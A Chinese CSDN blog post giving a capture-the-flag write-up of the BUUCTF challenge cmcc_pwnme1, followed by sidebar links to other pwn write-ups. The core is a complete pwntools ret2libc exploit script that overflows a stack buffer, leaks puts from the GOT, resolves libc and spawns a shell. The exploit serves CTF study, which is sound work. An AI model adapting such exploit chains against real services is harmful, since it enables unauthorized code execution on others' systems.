buuctf[cmcc_pwnme1]题解

最新推荐文章于 2023-05-27 18:09:21 发布
最新推荐文章于 2023-05-27 18:09:21 发布
阅读量306 收藏
点赞数
分类专栏: pwn 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/115257212
版权

拿到题目,发现getflag函数和简单栈溢出

高兴的尝试了一波,然而发现home目录下没有flag,倒是也正常,没有简单到这种程度

看一下保护

没有开,那也很简单,直接利用栈溢出,ret2libc即可

使用LibcSearcher直接搜索,这题就当是熟练手感了

from pwn import *
from LibcSearcher import LibcSearcher
context.log_level='debug'
# io=process('./pwnme1')
io=remote('node3.buuoj.cn',26669)
elf=ELF('./pwnme1')

getflag=0x08048677
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
start=0x08048570
main=0x080486F4

# io.recvuntil('>> 6. Exit    \n')
# io.sendline('5')
# payload='a'*(164+4)+p32(getflag)
# io.sendlineafter('name of fruit:',payload)

io.recvuntil('>> 6. Exit    \n')
io.sendline('5')
payload='a'*(164+4)+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendlineafter('name of fruit:',payload)
io.recvuntil('...\n')
puts_addr=u32(io.recv(4))

print "puts_addr----->"+hex(puts_addr)
libc=LibcSearcher('puts',puts_addr)
system=libc.dump('system')
puts_libc=libc.dump('puts')
libc_base=puts_addr-puts_libc
print "libc_base----->"+hex(libc_base)
binsh=libc.dump("str_bin_sh")+libc_base
system_addr=system+libc_base

io.sendline('5')
payload2='a'*(164+4)+p32(system_addr)+p32(0)+p32(binsh)
io.sendlineafter('name of fruit:',payload2)


io.interactive()

注释的地方是一开始尝试栈溢出到getflag没有成功的做法

最后成功拿到flag,不想再开一边端口了,总之他变红了 ;)

N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmcc pwnme1
pondzhang的专栏
12-27 240
from pwn import * from LibcSearcher import LibcSearcher #p = process('./pwnme1') p = remote("node3.buuoj.cn",29175) elf = ELF('./pwnme1') plt_puts = elf.plt['puts'] got_puts = elf.got['puts'] main = elf.symbols["main"] getfruit_addr = 0x08048624 payload =.
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
[BUUCTF-pwn]——cmcc_pwnme1
Y_peak的博客
03-09 426
[BUUCTF-pwn]——cmcc_pwnme1 题目地址:https://buuoj.cn/challenges#cmcc_pwnme1 先checksec一下,什么保护都没有开,嘶 在IDA中 看完之后,相信大家和我一样.就这??? 思路很清晰, 选择5,进入getfruit,利用栈溢出.修改返回地址为 getflag 结果, 没有这个文件, 搞笑呀 不过可以栈溢出, 我们可以利用ret2libc来解决 思路 通过栈溢出,循环调用. 第一次利用栈溢出leek出地址, 找到libc计算偏移找
jarvisoj_level4
z1r0的博客
12-09 212
jarvisoj_level4 查看保护 32位下的ret2libc。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27334) else: r = process(file_name) elf = ELF(file_name) def dbg(
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 678
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
Amigo_CMCC_Anjian.rar_Amigo_CMCC_Anji_UltraEdit_飞信
09-21
飞信 无UltraEdit-32 UltraEdit-32
SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
03-23
【标题】"SCH-MSM8909_MAIN BOARD_CMCC_PVT_A" 指的是一款基于高通骁龙MSM8909处理器的主板设计,主要用于中国移动通讯公司的定制产品。这个标题暗示了这是一个针对特定运营商的、经过私有化验证的主板设计方案。 ...
cmcc_simplerop
01-07
思路 明显rop可以用工具但是需要自己调一下长度emem ...p = 'a'*0x14+p32(1)*3 p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080
CMCC_cn_iPhone-15.5
05-20
移动运营商文件 CMCC_cn_iPhone-15.5
Cmcc.rar_cmcc_cmcc-edu_cmccgz_中国移动WLAN_自动登录
09-21
【标题】"Cmcc.rar_cmcc_cmcc-edu_cmccgz_中国移动WLAN_自动登录" 提供的信息主要涉及到中国移动的WLAN网络服务以及一个用于自动登录的程序。这个程序设计的目的是为了方便用户在支持中国移动WLAN网络的区域快速、...
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
BUUCTF之pwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1915
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
buuctf习题pwn(2~10)
yw__y的博客
03-30 1000
BUUCTF【pwn】解题记录(4-6页持续更新中)
Assassin
08-06 1565
一起继续刷BUUCTF把~
BUUCTF Pwn 1-12题解析及答案
红叶的博客
02-28 1440
这里使用fmtstr_payload直接替换 atoi_got 的原因是got表才是程序运行时函数的真正地址,通过替换atoi,修改为system,再送入'/bin/sh\x00' 即可成功getshell。s 的大小是0x3C,那么我们只需要输入 0x3C,也就是60 / 3 个I即可溢出,之后的内容我们可以就可以构建ROP链。也就是说,我们最多输入32个字节的东西,根据上文,我们可以输入32个I,这样就是32个you,也就是96个字节。0x0F + 0x08 代表 s 的大小加上8字节大小的rbp。
学习笔记:buuctf pwn题
RookieMOR的博客
06-28 305
如有不对,请指正
BUUCTF刷题之路-pwn1_sctf_20161
最新发布
qq_30528603的博客
05-27 435
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
CMCC LTE外场测试指南:注意事项与操作详解
1. 使用阶段:文档明确了测试的不同阶段,可能包括设备的安装、配置、日常使用以及故障排除等环节。这表明文档旨在指导测试人员在不同阶段如何有效地进行操作,确保测试过程的连贯性和有效性。 2. 自测阶段:这部分...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值